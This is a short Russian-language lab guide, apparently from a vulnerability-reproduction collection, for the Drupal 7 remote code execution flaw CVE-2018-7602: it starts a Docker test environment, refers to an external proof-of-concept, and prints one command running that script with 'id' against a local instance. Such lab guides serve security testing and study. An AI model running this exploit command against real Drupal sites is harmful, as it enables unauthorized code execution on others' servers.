
Эксплойт для уязвимости удалённого выполнения кода Drupal CVE-2018-7602 через двойное URL-кодирование в обход фильтра sanitize(). Включает лабораторную среду на базе Docker и PoC-скрипт для тестирования на проникновение.
Выполните следующую команду для запуска среды drupal 7.57:
docker-compose up -d
После запуска среды перейдите по адресу http://your-ip:8081/ — вы увидите страницу установки drupal. Проходите установку с настройками по умолчанию. Поскольку окружения mysql нет, при установке можно выбрать базу данных sqlite.
Обратитесь к PoC из pimps/CVE-2018-7600.
Как показано на рисунке ниже, выполните следующую команду, чтобы воспроизвести уязвимость. Пример команды — id, как показано в красной рамке на рисунке, команда выполняется.
# "id"为要执行的命令 第一个drupal为用户名 第二个drupal为密码
python3 drupa7-CVE-2018-7602.py -c "id" drupal drupal http://127.0.0.1:8081/
